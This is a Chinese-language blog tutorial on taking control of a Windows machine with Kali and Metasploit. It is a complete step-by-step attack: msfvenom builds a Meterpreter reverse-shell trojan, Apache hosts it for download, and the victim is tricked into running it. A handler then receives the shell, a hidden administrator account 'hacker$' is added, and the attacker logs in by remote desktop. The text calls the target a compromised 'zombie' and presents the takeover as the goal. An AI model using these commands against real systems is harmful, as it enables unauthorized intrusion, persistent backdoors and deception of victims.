使用Kali中的Metasploit生成木马控制Windows系统

一、概念:Kali基于debin的数字取证系统,上面集成了很多渗透测试工具,其前身是BT5 R3(BtackTrack)。
  其中Metasploit是一个综合利用工具,极大的提高了攻击者的渗透效率,使用Ruby开发的,使用非常方便,进入该工具的方式:msfconsole ,MSF依赖于Postgresql数据库,在使用MSF之前要开启数据库。

二、步骤:

  Step1:生成木马,msfvenom

msfvenom -p windows/meterpreter/reverse_tcp lhost=Kali的IP lport=5555 -f exe >/root/Desktop/evilshell.exe

      -p 参数后跟上payload,攻击成功后要做什么事情
      lhost 后跟监听的IP
      lpost 后跟监听端口
      -f 后跟要生成后门文件的类型
      >重定向

    

  Step2:将生成的木马文件evilshell.exe 拷贝到/var/www/html,开启apache服务,在肉鸡上打开浏览器,访问该站点(Kali的IP),下载木马文件。

cp evilshell.exe /var/www/html/
service apache2 start

  

  Step3:开启MSF,提前查看postgresql运行状态 msfconsole

ps -aux |grep postgresql

  

msfconsole

  

      exploits:开发利用,用来攻击某些服务、平台、系统等用到的工具
      payload:载荷载体,攻击成功后要操作什么

    输入以下命令

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp(选择木马时选的payload)
msf5 exploit(multi/handler) > show options
msf5 exploit(multi/handler) > set lhost kali的IP
msf5 exploit(multi/handler) > set lpost 5555
msf5 exploit(multi/handler) > run(或者exploit)

  

   

  Step4:在肉鸡中诱导用户点击exe程序(社会工程学攻击),在Kali中就会得到肉鸡的shell(meterpreter)

msf5 exploit(multi/handler) > run

  

   Step5:现在就可以给肉鸡添加用户了

net user
net user hacker$ /add  
net user hacker$ 123.com
net localgroup administrators hacker$ /add 添加到管理员组
net user hacker$

  

   Step6:远程登录肉鸡计算机

rdesktop + windows的IP

  

   

   

 至此,使用Kali控制Windows成功!

原文地址:https://www.cnblogs.com/yuanshu/p/11564904.html